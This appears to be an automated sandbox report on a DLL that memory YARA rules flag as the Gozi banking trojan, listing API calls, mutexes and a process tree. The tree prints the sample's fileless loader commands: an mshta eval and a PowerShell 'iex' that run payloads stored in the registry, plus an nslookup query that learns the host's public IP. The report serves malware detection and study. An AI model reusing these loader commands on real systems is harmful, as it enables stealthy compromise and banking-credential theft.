Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_00B1A027
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1E010 GetProcAddress,NtCreateSection,memset,	1_2_00B1E010
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B27AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_00B27AFF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B26CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_00B26CBC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_00B2AC94
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00B1ACD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B19DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_00B19DAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2CD7A NtQueryInformationProcess,	1_2_00B2CD7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B27579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	1_2_00B27579
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B17E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_00B17E14
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B347A1 NtMapViewOfSection,	1_2_00B347A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B137E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_00B137E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B240A7 memset,NtQueryInformationProcess,	1_2_00B240A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B17878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_00B17878
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B3298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_00B3298D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1AA15 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_00B1AA15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B24C67 NtGetContextThread,RtlNtStatusToDosError,	1_2_00B24C67
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B145FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_00B145FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_00B2956E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B21606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_00B21606
Source: C:\Windows\System32\control.exe	Code function: 24_2_00971084 NtQueryInformationProcess,	24_2_00971084
Source: C:\Windows\System32\control.exe	Code function: 24_2_009840A4 NtQueryInformationProcess,	24_2_009840A4
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097F0D0 NtReadVirtualMemory,	24_2_0097F0D0
Source: C:\Windows\System32\control.exe	Code function: 24_2_0096B980 NtMapViewOfSection,	24_2_0096B980
Source: C:\Windows\System32\control.exe	Code function: 24_2_009669DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	24_2_009669DC
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	24_2_0098D9EC
Source: C:\Windows\System32\control.exe	Code function: 24_2_00961148 NtCreateSection,	24_2_00961148
Source: C:\Windows\System32\control.exe	Code function: 24_2_00967DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	24_2_00967DA0
Source: C:\Windows\System32\control.exe	Code function: 24_2_00981DF4 NtWriteVirtualMemory,	24_2_00981DF4
Source: C:\Windows\System32\control.exe	Code function: 24_2_009846EC NtAllocateVirtualMemory,	24_2_009846EC
Source: C:\Windows\System32\control.exe	Code function: 24_2_009A1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	24_2_009A1002
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF1084 NtQueryInformationProcess,	26_2_0000016D9CFF1084
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	26_2_0000016D9D00D9EC
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D021002 NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_0000016D9D021002

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00B31CB8 CreateProcessAsUserA,

1_2_00B31CB8

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001F40B3	1_2_001F40B3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001FAF44	1_2_001FAF44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B248AD	1_2_00B248AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1D0DC	1_2_00B1D0DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2D057	1_2_00B2D057
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B37188	1_2_00B37188
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B162FA	1_2_00B162FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2DA71	1_2_00B2DA71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1E384	1_2_00B1E384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B28BF3	1_2_00B28BF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B14C03	1_2_00B14C03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2ED4B	1_2_00B2ED4B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B33EAF	1_2_00B33EAF
Source: C:\Windows\System32\control.exe	Code function: 24_2_009669DC	24_2_009669DC
Source: C:\Windows\System32\control.exe	Code function: 24_2_00984B78	24_2_00984B78
Source: C:\Windows\System32\control.exe	Code function: 24_2_00985428	24_2_00985428
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097A0F0	24_2_0097A0F0
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097B814	24_2_0097B814
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097782C	24_2_0097782C
Source: C:\Windows\System32\control.exe	Code function: 24_2_00979850	24_2_00979850
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098A074	24_2_0098A074
Source: C:\Windows\System32\control.exe	Code function: 24_2_009649C4	24_2_009649C4
Source: C:\Windows\System32\control.exe	Code function: 24_2_009819FC	24_2_009819FC
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098A9FC	24_2_0098A9FC
Source: C:\Windows\System32\control.exe	Code function: 24_2_009799F8	24_2_009799F8
Source: C:\Windows\System32\control.exe	Code function: 24_2_0096B9E8	24_2_0096B9E8
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097D92C	24_2_0097D92C
Source: C:\Windows\System32\control.exe	Code function: 24_2_0096596C	24_2_0096596C
Source: C:\Windows\System32\control.exe	Code function: 24_2_00977218	24_2_00977218
Source: C:\Windows\System32\control.exe	Code function: 24_2_00969A34	24_2_00969A34
Source: C:\Windows\System32\control.exe	Code function: 24_2_00962A34	24_2_00962A34
Source: C:\Windows\System32\control.exe	Code function: 24_2_0096DA3C	24_2_0096DA3C
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098E220	24_2_0098E220
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097AA28	24_2_0097AA28
Source: C:\Windows\System32\control.exe	Code function: 24_2_00986250	24_2_00986250
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098EA40	24_2_0098EA40
Source: C:\Windows\System32\control.exe	Code function: 24_2_0099027C	24_2_0099027C
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098A3B2	24_2_0098A3B2
Source: C:\Windows\System32\control.exe	Code function: 24_2_009893FC	24_2_009893FC
Source: C:\Windows\System32\control.exe	Code function: 24_2_009803EC	24_2_009803EC
Source: C:\Windows\System32\control.exe	Code function: 24_2_00976B00	24_2_00976B00
Source: C:\Windows\System32\control.exe	Code function: 24_2_00967B44	24_2_00967B44
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097B378	24_2_0097B378
Source: C:\Windows\System32\control.exe	Code function: 24_2_0096FCA0	24_2_0096FCA0
Source: C:\Windows\System32\control.exe	Code function: 24_2_0096ECE0	24_2_0096ECE0
Source: C:\Windows\System32\control.exe	Code function: 24_2_00971C0C	24_2_00971C0C
Source: C:\Windows\System32\control.exe	Code function: 24_2_009725A4	24_2_009725A4
Source: C:\Windows\System32\control.exe	Code function: 24_2_00965DA8	24_2_00965DA8
Source: C:\Windows\System32\control.exe	Code function: 24_2_00978DD0	24_2_00978DD0
Source: C:\Windows\System32\control.exe	Code function: 24_2_009665D8	24_2_009665D8
Source: C:\Windows\System32\control.exe	Code function: 24_2_009775D8	24_2_009775D8
Source: C:\Windows\System32\control.exe	Code function: 24_2_00976528	24_2_00976528
Source: C:\Windows\System32\control.exe	Code function: 24_2_00987D44	24_2_00987D44
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098C560	24_2_0098C560
Source: C:\Windows\System32\control.exe	Code function: 24_2_0097CE90	24_2_0097CE90
Source: C:\Windows\System32\control.exe	Code function: 24_2_009696D8	24_2_009696D8
Source: C:\Windows\System32\control.exe	Code function: 24_2_00990614	24_2_00990614
Source: C:\Windows\System32\control.exe	Code function: 24_2_00961600	24_2_00961600
Source: C:\Windows\System32\control.exe	Code function: 24_2_0096DF58	24_2_0096DF58
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D004B78	26_2_0000016D9D004B78
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D005428	26_2_0000016D9D005428
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFFD92C	26_2_0000016D9CFFD92C
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF9850	26_2_0000016D9CFF9850
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF782C	26_2_0000016D9CFF782C
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFFB814	26_2_0000016D9CFFB814
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE49C4	26_2_0000016D9CFE49C4
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE596C	26_2_0000016D9CFE596C
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00A074	26_2_0000016D9D00A074
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFFA0F0	26_2_0000016D9CFFA0F0
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFEDA3C	26_2_0000016D9CFEDA3C
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE2A34	26_2_0000016D9CFE2A34
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE9A34	26_2_0000016D9CFE9A34
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFFAA28	26_2_0000016D9CFFAA28
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF7218	26_2_0000016D9CFF7218
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF99F8	26_2_0000016D9CFF99F8
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFEB9E8	26_2_0000016D9CFEB9E8
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00A3B2	26_2_0000016D9D00A3B2
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE69DC	26_2_0000016D9CFE69DC
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D0019FC	26_2_0000016D9D0019FC
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00A9FC	26_2_0000016D9D00A9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00E220	26_2_0000016D9D00E220
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFFB378	26_2_0000016D9CFFB378
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00EA40	26_2_0000016D9D00EA40
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D006250	26_2_0000016D9D006250
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE7B44	26_2_0000016D9CFE7B44
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D01027C	26_2_0000016D9D01027C
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF6B00	26_2_0000016D9CFF6B00
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFEFCA0	26_2_0000016D9CFEFCA0
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D007D44	26_2_0000016D9D007D44
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00C560	26_2_0000016D9D00C560
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF1C0C	26_2_0000016D9CFF1C0C
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D0003EC	26_2_0000016D9D0003EC
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE5DA8	26_2_0000016D9CFE5DA8
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF25A4	26_2_0000016D9CFF25A4
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D0093FC	26_2_0000016D9D0093FC
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF6528	26_2_0000016D9CFF6528
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFEECE0	26_2_0000016D9CFEECE0
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFFCE90	26_2_0000016D9CFFCE90
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE1600	26_2_0000016D9CFE1600
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF75D8	26_2_0000016D9CFF75D8
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE65D8	26_2_0000016D9CFE65D8
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFF8DD0	26_2_0000016D9CFF8DD0
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D010614	26_2_0000016D9D010614
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFEDF58	26_2_0000016D9CFEDF58
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9CFE96D8	26_2_0000016D9CFE96D8
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D02138C	26_2_0000016D9D02138C

Source: ljarxop3.dll.19.dr	Static PE information: No import functions for PE file found
Source: huo1uow1.dll.21.dr	Static PE information: No import functions for PE file found

Source: 2200.dll

Binary or memory string: OriginalFilenameHunt.dll6 vs 2200.dll

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: 2200.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: 2200.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@33/166@21/4

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_001F229C CreateToolhelp32Snapshot,FindCloseChangeNotification,

1_2_001F229C

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFBA71BC-6CCB-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{26B249E4-4D23-486C-07BA-D1FC2B8E95F0}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{263DB3FF-4D32-482F-07BA-D1FC2B8E95F0}
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0EDC61D8-15B4-7076-0F22-19A4B3765D18}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFCB7F517F8398872F.TMP

Jump to behavior

Source: 2200.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: 2200.dll	Virustotal: Detection: 16%
Source: 2200.dll	ReversingLabs: Detection: 39%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2200.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2200.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17430 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A4AC.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2200.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:82962 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17422 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

